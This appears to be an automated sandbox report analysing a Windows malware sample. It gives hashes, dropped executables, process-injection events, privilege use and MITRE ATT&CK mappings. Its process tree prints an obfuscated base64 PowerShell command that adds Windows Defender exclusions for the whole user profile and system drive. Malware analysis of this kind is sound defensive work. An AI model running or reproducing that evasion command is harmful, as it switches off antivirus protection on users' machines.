ffaa5eea301ca6578ee0b3403513d77264246a77c18c8d529021045c15452940

Analysis

max time kernel
120s
max time network
125s
platform
windows7_x64
resource
win7-20250207-en
resource tags

arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
submitted
22/03/2025, 06:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe
Size

12.4MB
MD5

597dbb425d3fdbfcd96cfb7f0f447eda
SHA1

34f05cd0cdaca3015e2f6e3fd24ef460f1c0c037
SHA256

563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469
SHA512

75994ed55a09539f556f31442dd7ad838a1484466e2ab396b36d017f8fbc28bd0c052c17c0d74376d4e92837d1a4e6d97ec8190ad6ee0a1f8d5a8d6e6acc63bd
SSDEEP

393216:uTmEkeTbTQC4x2FVSRsWBWlBOBum5xo+s:GjTnxVRIFDzoD

Score

7^/10

defense_evasion pyinstaller

Malware Config

Signatures

.NET Reactor proctector 4 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral13/files/0x00050000000192eb-17.dat	net_reactor
behavioral13/memory/2836-21-0x0000000000F50000-0x0000000000F8C000-memory.dmp	net_reactor
behavioral13/memory/3000-29-0x0000000000390000-0x00000000003CC000-memory.dmp	net_reactor
behavioral13/files/0x0005000000019336-28.dat	net_reactor

Executes dropped EXE 4 IoCs

pid	Process
2840	nuker.exe
2836	DSAServiceUpdater.exe
3000	Node.exe
672	nuker.exe

Loads dropped DLL 15 IoCs

pid	Process
688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe
688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe
688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe
2840	nuker.exe
672	nuker.exe
1044	WerFault.exe
1704	WerFault.exe
1044	WerFault.exe
1704	WerFault.exe
1044	WerFault.exe
1704	WerFault.exe
1044	WerFault.exe
1704	WerFault.exe
1704	WerFault.exe
1044	WerFault.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral13/files/0x0007000000004e74-12.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2640	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	3000	Node.exe
Token: SeDebugPrivilege	2836	DSAServiceUpdater.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 688 wrote to memory of 2640	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	30
PID 688 wrote to memory of 2640	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	30
PID 688 wrote to memory of 2640	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	30
PID 688 wrote to memory of 2840	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	32
PID 688 wrote to memory of 2840	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	32
PID 688 wrote to memory of 2840	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	32
PID 688 wrote to memory of 2836	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	34
PID 688 wrote to memory of 2836	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	34
PID 688 wrote to memory of 2836	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	34
PID 688 wrote to memory of 3000	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	35
PID 688 wrote to memory of 3000	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	35
PID 688 wrote to memory of 3000	688	563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe	35
PID 2840 wrote to memory of 672	2840	nuker.exe	36
PID 2840 wrote to memory of 672	2840	nuker.exe	36
PID 2840 wrote to memory of 672	2840	nuker.exe	36
PID 3000 wrote to memory of 1044	3000	Node.exe	38
PID 3000 wrote to memory of 1044	3000	Node.exe	38
PID 3000 wrote to memory of 1044	3000	Node.exe	38
PID 2836 wrote to memory of 1704	2836	DSAServiceUpdater.exe	37
PID 2836 wrote to memory of 1704	2836	DSAServiceUpdater.exe	37
PID 2836 wrote to memory of 1704	2836	DSAServiceUpdater.exe	37

C:\Users\Admin\AppData\Local\Temp\563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe
"C:\Users\Admin\AppData\Local\Temp\563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAeQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAYgBrACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2640
- C:\Users\Admin\AppData\Local\nuker.exe
  "C:\Users\Admin\AppData\Local\nuker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Users\Admin\AppData\Local\nuker.exe
    "C:\Users\Admin\AppData\Local\nuker.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:672
- C:\Users\Admin\AppData\Local\DSAServiceUpdater.exe
  "C:\Users\Admin\AppData\Local\DSAServiceUpdater.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2836 -s 624
    3⤵
    - Loads dropped DLL
    PID:1704
- C:\Users\Admin\AppData\Local\Node.exe
  "C:\Users\Admin\AppData\Local\Node.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3000
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3000 -s 624
    3⤵
    - Loads dropped DLL
    PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Node.exe

Filesize
225KB

MD5
181994193a41a2237c9f03bd05fa05e8

SHA1
0580f732a6cec33037d7f9ab94af781c8cc1374d

SHA256
31e059406bdd39e02d4b160eacdc23e850630763558f0c74b3f0a29f90fb602f

SHA512
45fa74b23c18c6c0605374780d761e442fb23b314e971f728ec15d411bcabd4d7947b8be6d5141c206b12535a484c33b4c81d2154f8d3c48329cc4aed91480de

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28402\python39.dll

Filesize
4.3MB

MD5
64fde73c54618af1854a51db302192fe

SHA1
c5580dcea411bfed2d969551e8089aab8285a1d8

SHA256
d44753fe884b228da36acb17c879b500aeb0225a38fb7ca142fb046c60b22204

SHA512
a7d368301a27ee07a542e45e9ad27683707979fb198b887b66b523609f69e3327d4b77b7edc988c73a4fe26c44bff3abfcd032a991cd730fd8e0de2dad2e3a06

Download Submit
\Users\Admin\AppData\Local\DSAServiceUpdater.exe

Filesize
222KB

MD5
70fa96bb8c3fe5a7627319edae1f1ef5

SHA1
1dec9e8abddbfdb636b6f648fa13331a959aca0a

SHA256
bac55448c69532136a59db47212bb9cec775276f5d673afa1df865f11f77df5f

SHA512
b606e7aa69280d688f979cd4409be235228de2ca9cd0df3796aef6caaa5c727645757ec4dbeee9ed72929f698490bfc75e66becf16cb71d8aea4efb403509ea8

Download Submit
\Users\Admin\AppData\Local\nuker.exe

Filesize
11.9MB

MD5
4e92ec59842a81a9928f3518b0bcd1ca

SHA1
516fc5b9f5cd1821f2897c2abd9850fcf6fe278d

SHA256
e8838599e4c50e8e213e87dea7ea65b841df51ca2f50053b7a6800f4449bd5fa

SHA512
d66635486e571fb8a44f685766ce515a605ded953a5769da850d17e45f86874d242b7e5009ac527fc69ccfb9b0d773184165689615c097a847ed99f618d0e738

Download Submit
memory/688-30-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp

Filesize
9.9MB

Download
memory/688-0-0x000007FEF57F3000-0x000007FEF57F4000-memory.dmp

Filesize
4KB

Download
memory/688-2-0x000007FEF57F0000-0x000007FEF61DC000-memory.dmp

Filesize
9.9MB

Download
memory/688-1-0x00000000008D0000-0x000000000153A000-memory.dmp

Filesize
12.4MB

Download
memory/2640-11-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2640-7-0x0000000002DA0000-0x0000000002E20000-memory.dmp

Filesize
512KB

Download
memory/2640-9-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

Filesize
2.9MB

Download
memory/2836-21-0x0000000000F50000-0x0000000000F8C000-memory.dmp

Filesize
240KB

Download
memory/3000-29-0x0000000000390000-0x00000000003CC000-memory.dmp

Filesize
240KB

Download